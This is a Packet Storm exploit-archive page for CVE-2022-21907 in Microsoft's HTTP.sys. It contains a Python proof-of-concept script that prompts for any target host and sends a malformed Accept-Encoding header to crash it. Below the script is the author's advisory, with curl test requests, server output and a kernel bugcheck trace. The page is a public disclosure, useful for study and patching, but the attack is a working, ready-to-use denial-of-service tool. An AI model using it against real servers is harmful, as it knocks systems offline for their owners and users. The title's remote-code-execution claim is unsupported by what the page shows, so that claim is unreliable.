exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HTTP Protocol Stack Denial Of Service / Remote Code Execution

HTTP Protocol Stack Denial Of Service / Remote Code Execution
Posted Jan 17, 2022
Authored by nu11secur1ty

Proof of concept for a Microsoft HTTP protocol stack vulnerability that causes a denial of service.

tags | exploit, web, denial of service, protocol, proof of concept
advisories | CVE-2022-21907
SHA-256 | c2c18115a401a528cf1b5dc31c17571b0980e3c441f00ab74bcca4c29d729334

HTTP Protocol Stack Denial Of Service / Remote Code Execution

Change Mirror Download
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED +"Please input your host...\n")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE +"Sending an especially malicious crafted packet, please
wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
'AAAAAAAAAAAAAAAAAAAAAAAA,\
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
****************************stupiD, *, ,',})
# Not necessary :)
print(poc,"\n")
print(Style.RESET_ALL)





---- Original Advisory ----

## Title: HTTP.sys buffer overflow denial of service
## Author: nu11secur1ty
## Date: 01.12.2022
## Vendor: https://docs.microsoft.com/
## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0
## CVE-2022-21907

## Description:
NOTE: After a couple of hours of tests and experiments, there have
been no vulnerabilities when we decides to install the IIS packages on
these Windows platforms, it's ok, and everything is patched! Windows
Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by
default, but the Windows 10 version 2004 - 2020 year the HTTP Protocol
Stack (HTTP.sys) is vulnerable to buffer overflow - deny of service
and restart the system.
The attacker can be sending a maliciously crafted package to the
headers of the HTTP server of the system and this will be critical for
this system!
Not correctly sanitizing!
Status: CRITICAL

## Simple test connection before debugging

```cmd
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```
## 302

```cmd
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
```
- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## 404

```cmd
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## Bugcheck:

```cmd
1: kd> kp
Child-SP RetAddr Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28
1: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception
that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the
exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

*** WARNING: Unable to verify timestamp for win32k.sys

BUGCHECK_CODE: 139

BUGCHECK_P1: 3

BUGCHECK_P2: ffffa10287993480

BUGCHECK_P3: ffffa102879933d8

BUGCHECK_P4: 0

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of
a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63

MODULE_NAME: HTTP

IMAGE_NAME: HTTP.sys

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList

FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}

Followup: MachineOwner
---------
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)

## Proof and Exploit:
[href](https://streamable.com/fbojva)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close